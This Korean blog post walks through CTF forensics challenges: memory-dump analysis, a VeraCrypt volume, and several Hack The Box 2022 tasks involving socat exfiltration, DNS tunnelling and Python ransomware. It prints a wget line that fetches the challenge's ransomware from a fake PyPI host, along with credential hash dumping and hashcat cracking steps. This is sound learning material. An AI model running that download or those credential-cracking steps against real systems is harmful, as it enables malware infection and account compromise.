문제를 보겠습니다.

링크를 통해서 문제 파일을 받아오면 메모리 덤프 파일이 하나 주어진다.

문제를 읽어보면 jade가 인터넷 상에 히든 메세지를 숨겨놨고, 그 메세지를 찾는 문제인 것으로 추정된다.

메모라 덤프 파일의 프로파일을 확인을 해보겠다.

volatility_2.6_win64_standalone.exe -f explore.raw imageinfo

운영체제가 Win7임을 알 수 있었고, 문제에서 인터넷이라고 했으니 iehistory 플러그인을 사용해서 인터넷 사용기록을 봤으나 아무런 값도 나오지 않았고, 직접 인터넷 익스플로러 히스토리를 분석해야 되는건가 싶어서 실행되고 있는 프로세스를 검색하였다.

 volatility_2.6_win64_standalone.exe -f explore.raw --profile=Win7SP1x64 pstree

인터넷 익스플로러가 실행이 되고 있음을 확인했고, PID인 2008을 메모리 덤프 떠서 분석을 진행하였다.

 volatility_2.6_win64_standalone.exe -f explore.raw --profile=Win7SP1x64 memdump -p 2008 -D ./

로그를 살펴보기 전에, 방문을 한 인터넷 브라우저이기 때문에 http로 키워드 검색을 해봤다.

방문 흔적들을 찾아 볼 수 있었고, 나와있는 https://pastebin.com/8kcW6Xgg 를 들어가면 다음과 과 같은 사이트를 볼 수 있다.

패스워드를 입력하는 칸이 하나 있는 사이트를 볼 수 있는데, 여기에다가 패스워드를 숨긴 것으로 추정된다.

이제는 패스워드를 찾아야 되는데, 보통 사람의 심리상 사이트마다 계정의 아이디와 패스워드를 동일하게 쓰는 습관이 있기 때문에 jade 계정의 패스워드를 알기 위해서 hashdump 플러그인을 사용하였다.

volatility_2.6_win64_standalone.exe -f explore.raw --profile=Win7SP1x64 hashdump

Jade의 패스워드가 36190865427581166c4b557937a8159e로 인코딩 된 것을 볼 수 있다.

디코딩을 시켜주는 사이트에서 디코딩을 진행해보았다.

디코딩 한 값은 history이고 찾았던 사이트에 입력을 하니 플래그를 얻을 수 있었다.

진짜 어려운...마지막 문제를 풀어보도록 하겠습니다. (어드민이 약간의 힌트를 알려줘서 접근을 했던 문제입니다)

[Affair]

문제를 보겠습니다.

문제를 해석하면, 제이드가 아내의 컴퓨터에서 암호화된 파일을 가져왔고, 파일을 분석할 수 없으니 분석을 의뢰하는 문제이다.

링크를 통해서 다운 받으면, 100MB의 크기의 파일을 하나 얻을 수 있는데, 확장자가 없어 hxd로 열어보니 알아볼 수 없는 값으로 되어 있었다.

분석을 위해 칼리 리눅스로 들고가서 file 명령어로 파일을 확인한 결과도 마찬가지로 data 파일임을 알려주고 있다.

문제를 다시 한번 살펴보니 아내의 컴퓨터에서 암호화된 파일 키워드와 추가 정보에 패스워드라는 키워드가 있어서 디스크 파일임을 추측할 수 있었다.

그래서 패스워드를 크랙하기 위해 구글링을 해보니까 hash값으로 크랙을 하는 hashcat이 존재했고, 한번 사용을 해보았다.

hashcat으로 해쉬 알고리즘을 찾아보니 VeraCrypt와 TrueCrypt가 존재하였고, 디스크 파일인 것이 추측이 아니라 확정이 되었다.

사용법은 다음 블로그를 통해서 배워보시는 것이 좋을 것 같다.

https://hyunmini.tistory.com/132

패스워드를 크랙하기 위해서 다양한 명령어들을 써봤지만, 답을 찾을 수 없어서 어드민한테 여쭤보니 4글자 숫자 패스워드라고 알려줬다.

그렇기 때문에 "?d?d?d?d" 옵션을 사용하는 것을 알 수 있었고, 크랙을 바로 시도했다.

패스워드가 크랙되기 까지는 오래 걸리기 때문에, 그때 당시에 나온 패스워드는 6996이다.

veracrypt 프로그램에 마운트를 하고 6996을 입력하면 된다.

마운트가 정상적으로 이루어졌고, 디스크를 분석하러 가봅시당.

사진 파일과 txt 파일이 하나 있는데, 사진 파일에서는 아무것도 보이지 않았고 txt파일에는 숨어있는 공백 문자들이 있었다.

화이트스테가노 기법으로 보여지며, 프로그램을 돌렸으나 아무것도 안 나오는 것을 확인했다.

흠...그래서 고민을 하던 중, jpg 파일 hxd값에서 base64로 된 인코딩이 하나 있었다.

디코딩을 해보니 "57pearljam7" 이란 값으로 디코딩이 되었으며, 이게 패스워드 일것이라 생각해서 칼리 리눅스에서 stegsnow로 패스워드를 입력했다

플래그를 찾을 수 있었다.

Hack the Box CTF 2022

Ron Weasley — Sun, 23 Oct 2022 08:46:16 +0900

2022년 10월 23일 참가했던 CTF이다. 바로 풀이를 시작하겠습니다.

[Wrong Spooky Season]

문제를 한번 보겠습니다. (사진이 없어 글로 대체하겠습니다)

"I told them it was too soon and in the wrong season to deploy such a website, but they assured me that theming it properly would be enough to stop the ghosts from haunting us. I was wrong." Now there is an internal breach in the `Spooky Network` and you need to find out what happened. Analyze the the network traffic and find how the scary ghosts got in and what they did.

문제를 해석을 해보면, 네트워크 패킷 파일에서 수상한 패킷을 찾고 플래그를 찾는 그런 문제이다.

패킷을 보면, 3 - way -handshake 형태로 정상적인 패킷으로 보이고, GET으로 서버 리소스를 요청하는 아주 정상적인 패킷인 것을 확인할 수 있다.
HTTP 프로토콜이 있어, 가장 먼저 분석을 진행한 것은 HTTP List이다.

HTTP Object list를 보니 할로윈과 연관된 유령 jpg 파일들이 엄청 많이 있었고 전부다 카빙을 진행 했다.

하지만 사진에서는 정답과 관련된 내용들이 일절 없고 그냥...할로윈인 것을 보여주는 사진들 밖에 없었기 때문에 다른 패킷을 분석하였다.

TCP Stream의 10번 패킷을 보면, root로 된 데이터를 하나 볼 수 있는데 뭔가 수상해서 다른 TCP Stream도 분석을 진행 했다.

루트의 uid, gid, groups과 관련된 정보들도 있다.

그리고 업그레이드를 하는 패킷도 볼 수 있는데, 이 패킷을 보면 네트워크 패킷을 잡은 운영체제가 데비안 기반으로 된 칼리 리눅스임을 알 수 있었다.

하나씩 따라가던 중, TCP Stream 14번에서 passwd 파일을 출력하는 명령어를 실행하는 것을 볼 수 있는데, 조금더 내려보면 다음과 같은 패킷들이 잡혀있다.

find로 된 명령어를 해석해보면, 퍼미션이 setuid로 된 파일을 찾는 것이다.그리고 하단에 echo로 명령어를 실행하는데, socat으로 192.168.1.180 아이피에 데이터를 전송하는것을 볼 수 있다.그래서 데이터 중 ==gC9~~~~로 된 부분이 base64로 인코딩된 문자열이 reserved된 것을 확인할 수 있었고 다음 코드를 짜서 뒤집어 주면 된다.

a = "==gC9FSI5tGMwA3cfRjd0o2Xz0GNjNjYfR3c1p2Xn5WMyBXNfRjd0o2eCRFS"
b = "".join(reversed(a))

print(b)

뒤집어서 나온 값을 가지고 base64 디코딩을 하면 플래그를 찾을 수 있다.

[Trick or Breach]

문제를 한번 보겠습니다.

woods invented a potion to bring pumpkins to life, but in a more up-to-date approach. Unfortunately, we learned that malicious actors accessed our network in a massive cyber attack. Our security team found that the hack had occurred when a group of children came into the office's security external room for trick or treat. One of the children was found to be a paid actor and managed to insert a USB into one of the security personnel's computers, which allowed the hackers to gain access to the company's systems. We only have a network capture during the time of the incident. Can you find out if they stole the secret project?

공격을 당했고, 네트워크 패킷으로 어떤 프로젝트를 훔쳤는지 알아봐달라고 하면서 패킷 파일을 하나 던져줍니다.
패킷을 한번 보겠습니다.

DNS 패킷들이 엄청 많이 잡혀있는 것을 볼 수 있고, 쿼리로 찍힌 데이터가 504b0304인 것으로 보아 pkzip 형식의 파일임을 알 수 있습니다.
데이터를 추출하기 위해 tshark를 사용했습니다.

tshark -r capture_1.pcap -T fields -e dns.qry.name > out.txt

위 코드를 입력하면 out.txt가 나오는데, 안에 데이터를 살펴보면 2개씩 찍혀있는 것을 볼 수 있습니다.

1개씩 다 지우고, pumpkincorp.com을 지우고 zip 확장자로 바꿔주면 다음과 같은 파일들이 보입니다.

안에 있는 데이터들 중, 하나씩 hxd값으로 열어보니 플래그를 찾을 수 있었습니다.

[POOF]

문제를 보겠습니다.

In my company, we are developing a new python game for Halloween. I'm the leader of this project; thus, I want it to be unique. So I researched the most cutting-edge python libraries for game development until I stumbled upon a private game-dev discord server. One member suggested I try a new python library that provides enhanced game development capabilities. I was excited about it until I tried it. Quite simply, all my files are encrypted now. Thankfully I manage to capture the memory and the network traffic of my Linux server during the incident. Can you analyze it and help me recover my files? To get the flag, connect to the docker service and answer the questions.

이 문제는, 게임을 개발하려고 라이브러리를 설치했다가 랜섬에 감염되는 시나리오입니다.

그리고 문제 풀이를 위해서 도커도 생성된 것을 볼 수 있습니다. 한번 들어가볼까요?

nc 139.59.167.169 31208

이렇게 하나씩 질문에 대한 답을 해결하면서 플래그를 찾는 문제 유형임을 알 수 있습니다. 이제 풀이를 시작하도록 하겠습니다.

주어진 문제 파일들을 살펴보면, 다음과 같습니다.

랜섬에 감염된 pdf파일, 메모리 덤프 파일, pcap 파일, 리눅스 generic 파일 총 4개가 들어있습니다.
일단 메모리 덤프 파일에 리눅스 generic 파일을 준 것으로 보아, 리눅스 메모리 포렌식임을 알 수 있습니다.
해당 zip 파일을 /volatility/volatility/plugins/overlays/linux/ 경로에 넣어주시고 다음 명령어를 입력하시면 됩니다.

python vol.py --info

입력을 하시면 volatility가 인식을 하게 되어, 리눅스 메모리 포렌식의 준비가 되었습니다.

이렇게 나오시면 정상적으로 인식을 한 겁니다.
프로세스를 보기 위해서 linux_pslist 플러그인을 사용하겠습니다.

python vol.py -f mem2.dmp --profile=LinuxUbuntu_4_15_0-184-generic_profilex64 linux_pslist

cofigure이라는 프로세스 명을 가진 친구가 bash로 인해서 실행이 된 것으로 보아, 터미널에서 입력했던 명령어 히스토리를 보겠습니다.

python vol.py -f mem2.dmp --profile=LinuxUbuntu_4_15_0-184-generic_profilex64 linux_bash

딱 느낌이 바로 왔습니다. wget으로 pygaming-dev-13.37.tar.gz을 다운 받아서 압축을 풀고 configure을 실행시킨 후 랜섬에 감염된 시나리오입니다.
문제를 풀기위해 아까 접속했던 도커를 보면, 랜섬웨어를 다운 받은 url 경로를 묻는 문제가 있습니다. 거기에다가 bash로 나온 http ~~를 입력해주시면 됩니다.

문제를 풀고나면 또 다음 문제가 주어지는 형태이기 때문에 다음 문제를 한번 보겠습니다.

malware의 프로세스 이름을 묻는거기 때문에 아까 configure를 실행했을 때, 감염이 되었으니까 configure이 됩니다.

다음 문제를 보겠습니다.

랜섬웨어 파일의 md5를 찾는 문제인데, 여기서부터는 제가 헤맸던 부분까지 적을 것이여서 조금 내용이 길 수 있음을 알려드립니다.
랜섬웨어를 찾기 위해서, linux_find_file 명령어로 파일의 메모리 주소를 파악했습니다.

python vol.py -f mem2.dmp --profile=LinuxUbuntu_4_15_0-184-generic_profilex64 linux_find_file -L > filescan.txt

-L 옵션은 모든 리스트를 출력하라는 것이고, txt로 파일을 받아서 configure을 검색했습니다.

검색이 된 로그들을 살펴보면, 누가봐도 시나리오와 동일한...친구들이 보이네요..!!
그래서 일단, configure을 추출했습니다.

추출이 완료되어 md5sum을 체크했습니다.

md5sum configure

이제 저 md5 해쉬값을 답으로 제출을 넣어봤지만, 정답이 아니였습니다.

왜냐하면, 해당 파일을 hxd 열어봤을 때, elf 파일이긴 하지만, 80프로 이상이 NULL 값으로 추출이 되었기 때문입니다.

그래서 문제를 만든 제작자가 wget으로 gz을 다운받아서 압축을 해제했으니까, 같은 명령어로 gz을 받고 압축을 해제하면 될 것이라는 생각이 떠올라 바로 해봤습니다.

wget http://files.pypi-install.com/packages/a5/61/caf3af6d893b5cb8eae9a90a3054f370a92130863450e3299d742c7a65329d94/pygaming-dev-13.37.tar.gz

gz파일이 다운 받아지는 것을 볼 수 있습니다.

확인 완료 후, 동일한 명령어로 압축을 해제하겠습니다.

tar -xf pygaming-dev-13.37.tar.gz

tar 파일이 아니라고...되어있네요...진짜 file로 확인을 해보니 아니라고 뜹니다.

file pygaming-dev-13.37.tar.gz

여기서부터 이제 멘붕의 시작이였으나...해결을 했으니, 바로 풀어야죠?? ㅎㅎㅎ
아까 처음에 zip파일을 풀었던 파일중, pcap파일이 하나 있는데, 이걸 열면 원본 파일을 구할 수 있습니다.

여기서 파일을 카빙 후, gz으로 완성을 시켜야 하기 때문에, raw로 변경하여 가져오겠습니다.
gz의 시그니처는 1F 8B 08이기 때문에 이렇게 하시면 됩니다.

파일 이름을 .gz으로 바꾸고 저장을 하면 됩니다.

제대로 카빙을 했으면, 이렇게 나옵니다!
안에 있는 파일을 추출하면, 이제 원래 랜섬웨어 파일이 나오게됩니다. 속성을 확인하여 md5를 구하고 넣어주면??

또 틀렸다고 뜹니다... 도대체 뭐가 문제일까...해보니 아까 우리가 리눅스에서 추출했던 configure파일이랑 지금 추출한 파일의 크기를 비교해야됩니다.

보시면, 왼쪽이 pcap파일에서 추출한 파일 오른쪽이 리눅스에서 추출한 파일입니다.
파일의 크기가 다른것을 확인할 수 있습니다. 그래서...구조적으로 맞춰줘야 하기 때문에 수정을 조금 했습니다.

수정하는 방법이 조금 까다롭기 때문에, 이해가 어려우실 수 있지만 하나씩 해보겠습니다.
먼저, pcap에서 추출한 파일 시그니처를 보면 elf가 아니기 때문에 elf가 시작되는 위치까지 데이터를 날려줘야합니다.

다음은 제일 하단에, NULL값이 되어있는 놈들 지워야 하는데 본 파일인 configure의 총 오프셋을 한번 보겠습니다.

0x727317이니까, 똑같이 추출한 파일도 맞춰줍시다.

그리고 저장하고 md5를 확인하겠습니다.

저 값을 집어넣으면 Corrcet가 뜨는것을 확인할 수 있습니다.

다음 문제를 보겠습니다.

어떤 프로그래밍 언어로 되어있냐...라고 적혀있네요??
아까 복원을 했던 랜섬웨어 파일을 IDA로 까봅시다.

main 함수(sub_403DD0) 를 보면, PYI_PROCNAME이라는 파라미터도 볼 수 있고, 조금 더 들어가보면 sub_403B00이 있는데, 안에 들어있는 로직을 보면 다음과 같습니다.

.py로 된 파일을 가지고 어떠한 행동을 하는 로직을 볼 수 있습니다. (코드 분석을 안했기 때문에 정확히 어떤 로직인지는 다음에 작성)
결국, py를 건든다는 것을 보면 파이썬 코드로 된 랜섬웨어임을 알 수 있습니다. 그래서 답은 파이썬이 됩니다.

다음 문제를 한번 보겠습니다.

랜섬웨어 파일을 디컴파일 하여 암호화를 시키는 함수를 찾는건데, 원래 이 문제는 기능만 찾는 문제였습니다.
하지만 제가 어드민에게 신고를 하여 문제 수정이 이루어진 문제입니다.

이렇게 말이죠...ㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋ 해프닝..!
파이썬으로 짜여진 실행파일이라 했으니 pyinstaller로 만들어진 파일이고, 디컴파일을 할려고 오픈소스를 좀 가지고 왔습니다.

from __future__ import print_function
import os
import struct
import marshal
import zlib
import sys
from uuid import uuid4 as uniquename


class CTOCEntry:
    def __init__(self, position, cmprsdDataSize, uncmprsdDataSize, cmprsFlag, typeCmprsData, name):
        self.position = position
        self.cmprsdDataSize = cmprsdDataSize
        self.uncmprsdDataSize = uncmprsdDataSize
        self.cmprsFlag = cmprsFlag
        self.typeCmprsData = typeCmprsData
        self.name = name


class PyInstArchive:
    PYINST20_COOKIE_SIZE = 24           # For pyinstaller 2.0
    PYINST21_COOKIE_SIZE = 24 + 64      # For pyinstaller 2.1+
    MAGIC = b'MEI\014\013\012\013\016'  # Magic number which identifies pyinstaller

    def __init__(self, path):
        self.filePath = path
        self.pycMagic = b'\0' * 4
        self.barePycList = [] # List of pyc's whose headers have to be fixed


    def open(self):
        try:
            self.fPtr = open(self.filePath, 'rb')
            self.fileSize = os.stat(self.filePath).st_size
        except:
            print('[!] Error: Could not open {0}'.format(self.filePath))
            return False
        return True


    def close(self):
        try:
            self.fPtr.close()
        except:
            pass


    def checkFile(self):
        print('[+] Processing {0}'.format(self.filePath))

        searchChunkSize = 8192
        endPos = self.fileSize
        self.cookiePos = -1

        if endPos < len(self.MAGIC):
            print('[!] Error : File is too short or truncated')
            return False

        while True:
            startPos = endPos - searchChunkSize if endPos >= searchChunkSize else 0
            chunkSize = endPos - startPos

            if chunkSize < len(self.MAGIC):
                break

            self.fPtr.seek(startPos, os.SEEK_SET)
            data = self.fPtr.read(chunkSize)

            offs = data.rfind(self.MAGIC)

            if offs != -1:
                self.cookiePos = startPos + offs
                break

            endPos = startPos + len(self.MAGIC) - 1

            if startPos == 0:
                break

        if self.cookiePos == -1:
            print('[!] Error : Missing cookie, unsupported pyinstaller version or not a pyinstaller archive')
            return False

        self.fPtr.seek(self.cookiePos + self.PYINST20_COOKIE_SIZE, os.SEEK_SET)

        if b'python' in self.fPtr.read(64).lower():
            print('[+] Pyinstaller version: 2.1+')
            self.pyinstVer = 21     # pyinstaller 2.1+
        else:
            self.pyinstVer = 20     # pyinstaller 2.0
            print('[+] Pyinstaller version: 2.0')

        return True


    def getCArchiveInfo(self):
        try:
            if self.pyinstVer == 20:
                self.fPtr.seek(self.cookiePos, os.SEEK_SET)

                # Read CArchive cookie
                (magic, lengthofPackage, toc, tocLen, pyver) = \
                struct.unpack('!8siiii', self.fPtr.read(self.PYINST20_COOKIE_SIZE))

            elif self.pyinstVer == 21:
                self.fPtr.seek(self.cookiePos, os.SEEK_SET)

                # Read CArchive cookie
                (magic, lengthofPackage, toc, tocLen, pyver, pylibname) = \
                struct.unpack('!8siiii64s', self.fPtr.read(self.PYINST21_COOKIE_SIZE))

        except:
            print('[!] Error : The file is not a pyinstaller archive')
            return False

        self.pymaj, self.pymin = (pyver//100, pyver%100) if pyver >= 100 else (pyver//10, pyver%10)
        print('[+] Python version: {0}.{1}'.format(self.pymaj, self.pymin))

        # Additional data after the cookie
        tailBytes = self.fileSize - self.cookiePos - (self.PYINST20_COOKIE_SIZE if self.pyinstVer == 20 else self.PYINST21_COOKIE_SIZE)

        # Overlay is the data appended at the end of the PE
        self.overlaySize = lengthofPackage + tailBytes
        self.overlayPos = self.fileSize - self.overlaySize
        self.tableOfContentsPos = self.overlayPos + toc
        self.tableOfContentsSize = tocLen

        print('[+] Length of package: {0} bytes'.format(lengthofPackage))
        return True


    def parseTOC(self):
        # Go to the table of contents
        self.fPtr.seek(self.tableOfContentsPos, os.SEEK_SET)

        self.tocList = []
        parsedLen = 0

        # Parse table of contents
        while parsedLen < self.tableOfContentsSize:
            (entrySize, ) = struct.unpack('!i', self.fPtr.read(4))
            nameLen = struct.calcsize('!iiiiBc')

            (entryPos, cmprsdDataSize, uncmprsdDataSize, cmprsFlag, typeCmprsData, name) = \
            struct.unpack( \
                '!iiiBc{0}s'.format(entrySize - nameLen), \
                self.fPtr.read(entrySize - 4))

            name = name.decode('utf-8').rstrip('\0')
            if len(name) == 0:
                name = str(uniquename())
                print('[!] Warning: Found an unamed file in CArchive. Using random name {0}'.format(name))

            self.tocList.append( \
                                CTOCEntry(                      \
                                    self.overlayPos + entryPos, \
                                    cmprsdDataSize,             \
                                    uncmprsdDataSize,           \
                                    cmprsFlag,                  \
                                    typeCmprsData,              \
                                    name                        \
                                ))

            parsedLen += entrySize
        print('[+] Found {0} files in CArchive'.format(len(self.tocList)))


    def _writeRawData(self, filepath, data):
        nm = filepath.replace('\\', os.path.sep).replace('/', os.path.sep).replace('..', '__')
        nmDir = os.path.dirname(nm)
        if nmDir != '' and not os.path.exists(nmDir): # Check if path exists, create if not
            os.makedirs(nmDir)

        with open(nm, 'wb') as f:
            f.write(data)


    def extractFiles(self):
        print('[+] Beginning extraction...please standby')
        extractionDir = os.path.join(os.getcwd(), os.path.basename(self.filePath) + '_extracted')

        if not os.path.exists(extractionDir):
            os.mkdir(extractionDir)

        os.chdir(extractionDir)

        for entry in self.tocList:
            self.fPtr.seek(entry.position, os.SEEK_SET)
            data = self.fPtr.read(entry.cmprsdDataSize)

            if entry.cmprsFlag == 1:
                data = zlib.decompress(data)
                # Malware may tamper with the uncompressed size
                # Comment out the assertion in such a case
                assert len(data) == entry.uncmprsdDataSize # Sanity Check

            if entry.typeCmprsData == b'd' or entry.typeCmprsData == b'o':
                # d -> ARCHIVE_ITEM_DEPENDENCY
                # o -> ARCHIVE_ITEM_RUNTIME_OPTION
                # These are runtime options, not files
                continue

            basePath = os.path.dirname(entry.name)
            if basePath != '':
                # Check if path exists, create if not
                if not os.path.exists(basePath):
                    os.makedirs(basePath)

            if entry.typeCmprsData == b's':
                # s -> ARCHIVE_ITEM_PYSOURCE
                # Entry point are expected to be python scripts
                print('[+] Possible entry point: {0}.pyc'.format(entry.name))

                if self.pycMagic == b'\0' * 4:
                    # if we don't have the pyc header yet, fix them in a later pass
                    self.barePycList.append(entry.name + '.pyc')
                self._writePyc(entry.name + '.pyc', data)

            elif entry.typeCmprsData == b'M' or entry.typeCmprsData == b'm':
                # M -> ARCHIVE_ITEM_PYPACKAGE
                # m -> ARCHIVE_ITEM_PYMODULE
                # packages and modules are pyc files with their header intact

                # From PyInstaller 5.3 and above pyc headers are no longer stored
                # https://github.com/pyinstaller/pyinstaller/commit/a97fdf
                if data[2:4] == b'\r\n':
                    # < pyinstaller 5.3
                    if self.pycMagic == b'\0' * 4: 
                        self.pycMagic = data[0:4]
                    self._writeRawData(entry.name + '.pyc', data)

                else:
                    # >= pyinstaller 5.3
                    if self.pycMagic == b'\0' * 4:
                        # if we don't have the pyc header yet, fix them in a later pass
                        self.barePycList.append(entry.name + '.pyc')

                    self._writePyc(entry.name + '.pyc', data)

            else:
                self._writeRawData(entry.name, data)

                if entry.typeCmprsData == b'z' or entry.typeCmprsData == b'Z':
                    self._extractPyz(entry.name)

        # Fix bare pyc's if any
        self._fixBarePycs()


    def _fixBarePycs(self):
        for pycFile in self.barePycList:
            with open(pycFile, 'r+b') as pycFile:
                # Overwrite the first four bytes
                pycFile.write(self.pycMagic)


    def _writePyc(self, filename, data):
        with open(filename, 'wb') as pycFile:
            pycFile.write(self.pycMagic)            # pyc magic

            if self.pymaj >= 3 and self.pymin >= 7:                # PEP 552 -- Deterministic pycs
                pycFile.write(b'\0' * 4)        # Bitfield
                pycFile.write(b'\0' * 8)        # (Timestamp + size) || hash 

            else:
                pycFile.write(b'\0' * 4)      # Timestamp
                if self.pymaj >= 3 and self.pymin >= 3:
                    pycFile.write(b'\0' * 4)  # Size parameter added in Python 3.3

            pycFile.write(data)


    def _extractPyz(self, name):
        dirName =  name + '_extracted'
        # Create a directory for the contents of the pyz
        if not os.path.exists(dirName):
            os.mkdir(dirName)

        with open(name, 'rb') as f:
            pyzMagic = f.read(4)
            assert pyzMagic == b'PYZ\0' # Sanity Check

            pyzPycMagic = f.read(4) # Python magic value

            if self.pycMagic == b'\0' * 4:
                self.pycMagic = pyzPycMagic

            elif self.pycMagic != pyzPycMagic:
                self.pycMagic = pyzPycMagic
                print('[!] Warning: pyc magic of files inside PYZ archive are different from those in CArchive')

            # Skip PYZ extraction if not running under the same python version
            if self.pymaj != sys.version_info.major or self.pymin != sys.version_info.minor:
                print('[!] Warning: This script is running in a different Python version than the one used to build the executable.')
                print('[!] Please run this script in Python {0}.{1} to prevent extraction errors during unmarshalling'.format(self.pymaj, self.pymin))
                print('[!] Skipping pyz extraction')
                return

            (tocPosition, ) = struct.unpack('!i', f.read(4))
            f.seek(tocPosition, os.SEEK_SET)

            try:
                toc = marshal.load(f)
            except:
                print('[!] Unmarshalling FAILED. Cannot extract {0}. Extracting remaining files.'.format(name))
                return

            print('[+] Found {0} files in PYZ archive'.format(len(toc)))

            # From pyinstaller 3.1+ toc is a list of tuples
            if type(toc) == list:
                toc = dict(toc)

            for key in toc.keys():
                (ispkg, pos, length) = toc[key]
                f.seek(pos, os.SEEK_SET)
                fileName = key

                try:
                    # for Python > 3.3 some keys are bytes object some are str object
                    fileName = fileName.decode('utf-8')
                except:
                    pass

                # Prevent writing outside dirName
                fileName = fileName.replace('..', '__').replace('.', os.path.sep)

                if ispkg == 1:
                    filePath = os.path.join(dirName, fileName, '__init__.pyc')

                else:
                    filePath = os.path.join(dirName, fileName + '.pyc')

                fileDir = os.path.dirname(filePath)
                if not os.path.exists(fileDir):
                    os.makedirs(fileDir)

                try:
                    data = f.read(length)
                    data = zlib.decompress(data)
                except:
                    print('[!] Error: Failed to decompress {0}, probably encrypted. Extracting as is.'.format(filePath))
                    open(filePath + '.encrypted', 'wb').write(data)
                else:
                    self._writePyc(filePath, data)


def main():
    if len(sys.argv) < 2:
        print('[+] Usage: pyinstxtractor.py <filename>')

    else:
        arch = PyInstArchive(sys.argv[1])
        if arch.open():
            if arch.checkFile():
                if arch.getCArchiveInfo():
                    arch.parseTOC()
                    arch.extractFiles()
                    arch.close()
                    print('[+] Successfully extracted pyinstaller archive: {0}'.format(sys.argv[1]))
                    print('')
                    print('You can now use a python decompiler on the pyc files within the extracted directory')
                    return

            arch.close()


if __name__ == '__main__':
    main()

https://github.com/extremecoders-re/pyinstxtractor/blob/master/pyinstxtractor.py
여기 사이트를 참고하면 됩니다!!!
그래서 코드를 돌리면, 다음과 같은 파일들이 추출됩니다.

pyc 파일을 또 디컴파일해서 보려면 리눅스에서 uncompyle6 도구를 사용합니다.
위에 추출된 파일 중 configure.pyc 파일이 있는데, 이 파일을 툴을 사용해서 열면 다음과 같이 소스코드를 볼 수 있습니다.

uncompyle6 configure.pyc

이렇게 까지 했으면, 이제 아까 그 문제를 풀 수 있습니다.
암호화를 시키는 함수명은 mv18jiVh6TJI9lzY입니다.

다음 질문을 보겠습니다.

아까 처음에 줬던 .pdf.boo 파일인 친구를 해독해서 md5 값을 달라.
즉, 저기 코딩 되어있는 key 값과, iv 값을 이용해서 aes 복호화를 하는데 aes 모드는 CFB로 해라. 이말입니다.
여기서 진짜 10시간 이상 허비했습니다...하지만 풀이 자체는 엄청 단순하기에 올리도록 하겠습니다.

#!/usr/bin/python3
from Crypto.Cipher import AES
import random, string, time, os

def decrypte(filename: str) -> None:
    data = open(filename, 'rb').read() # candy_dungeon.pdf.boo 파일 불러옴
    key = 'vN0nb7ZshjAWiCzv'
    iv = b'ffTC776Wt59Qawe1'
    cipher = AES.new(key.encode('utf-8'), AES.MODE_CFB, iv)
    ct = cipher.decrypt(data) 
    # 원래는 여기서 encrypt로 암호화를 시키지만
    # 복호화를 하기 위해 decrypt로 변환
    Pkrr1fe0qmDD9nKx(filename, ct)

def Pkrr1fe0qmDD9nKx(filename: str, data: bytes) -> None:
    open(filename, 'wb').write(data)
    os.rename(filename, f"{filename}.pdf")

if __name__ == '__main__':
    filename = "candy_dungeon.pdf.boo" # 복호화 할 파일 이름
    decrypte(filename) # 복호화 함수 실행

코드를 실행시키면 pdf 파일이 하나 생성되는데, 그 파일의 MD5를 입력하시면 됩니다.

[Downgrade]

문제를 보겠습니다.

During recent auditing, we noticed that network authentication is not forced upon remote connections to our Windows 2012 server. That led us to investigate our system for suspicious logins further. Provided the server's event logs, can you find any suspicious successful login?

문제를 보면, Windows 2012 서버에 원격 연결 시 네트워크 인증이 강제 되지 않으며, 의심스로운 로그인이 있는지 추가로 조사를 하는데, 서버의 이벤트 로그를 제공하면 의심스럽게 로그인을 했지만 성공한 기록을 찾을 수 있는지 물어보는 시나리오 입니다.
그래서 다시 이번 문제도 위 문제처럼 nc로 들어가서 푸는 문제이고 주어진 파일을 다운로드 하면 이벤트로그가 많이 있습니다.

그리고 nc로 문제에 접근을 하여 첫번째 문제를 보겠습니다.

음...로그온 및 로그오프 이벤트에 대한 정보를 포함하는 이벤트 로그를 찾는 문제인데, 사실상 이건 Security파일로 답이 바로 나옵니다.
왜냐면, 이벤트 로그의 파일들이 Application, Security, System 이렇게 크게 3개로 나뉘는데, 크게 다음과 같다.
Application 이벤트 로그파일에는 응용 프로그램이 기록한 다양한 이벤트가 저장하며, System 이벤트 로그는 Windows 시스템 구성요소가 기록하는 이벤트로 시스템 부팅 시, 드라이버가 로드되지 않는 경우와 같이 구성요소의 오류를 기록하는 파일이기 때문이다. 나머지 Security는 유효하거나 유효하지 않은 로그온 시도 및 파일 생성, 열람, 삭제 등 리소스 사용에 관련된 이벤트를 기록합니다.

구구절절 설명을 좀 해봤는데, 아무튼 로그온과 관련된 이벤트 로그는 Security입니다. 이벤트를 한번 열어보면 바로 알 수 있습니다.

Logon이라고 적혀있는 이벤트를 볼 수 있습니다.
다음 문제를 보겠습니다.

로컬 컴퓨터에 성공적으로 로그온 하기위한 로그 이벤트 ID라면, 127.0.0.1에 접속한 로그온 이벤트를 보면 됩니다.

4624번 이벤트 ID가 127.0.0.1에 접속을 하고 있는 것을 볼 수 있습니다.

다음 문제를 보겠습니다.

기본 Active Directory 인증 프로토콜을 찾는 문제입니다.
먼저, 액티브 디렉터리는 윈도우 도메인 네트워크 용으로 마이크로소프트에서 개발한 디렉터리 서비스이며, 대부분의 Windows Server 운영체제에 일련의 프로세스 및 서비스로 포함되어 있습니다.

분석을 진행하기 앞서 이벤트 로그에 남는 로그의 로그온 유형을 살펴보도록 하겠습니다.

문제를 대조하지 않고 하나씩 읽어보기에는 이벤트 로그가 19000개 가량 되기 때문에 분석을 진행하기 어려웠고, 문제와 대조 했을 때 네트워크를 검사하지 않고 로그온, 원격 이라는 키워드를 봤을 때 유형 3과 유형 10이 유력하다고 판단을 하여 분석을 진행하였다.

그래서 유형 3번을 찾아서 보다가 로그온 프로세스가 Kerberos라는 이름으로 하나 잡히는 것이 있었다.

그래서 수상해서 더 분석을 진행한 결과 Kerberos 프로토콜을 가진 Logon 이벤트 기록들이 로그인 유형 3을 가지고 있음을 확인할 수 있었고, 이번 질문에 대한답은 Kerberos이다.

다음 문제를 보겠습니다.

이번 문제는 모든 로그온 이벤트를 살펴보면 다른 모든 이벤트와 다른 인증 패키지가 무엇인지 묻는 문제이다.

인증 세부 정보에 보면, NTLM 전용이라고 적혀있기 때문에 답은 NTLM이 된다.

다음 문제를 보겠습니다.

최종적으로 의심스러운 로그인을 했던 시간을 찾고, UTC를 기준으로 타임스탬프를 입력하는 문제이다.
로그들을 보다가 딱 하고 의심스러운게 하나 있었고 데이터들을 한번 살펴보자.

다른 애들을 살펴보면, 워크스테이션 이름이 SRV01로 된 로그들을 많이 볼 수 있는데 kali가 있는것으로 보아 수상하다고 느꼈다.
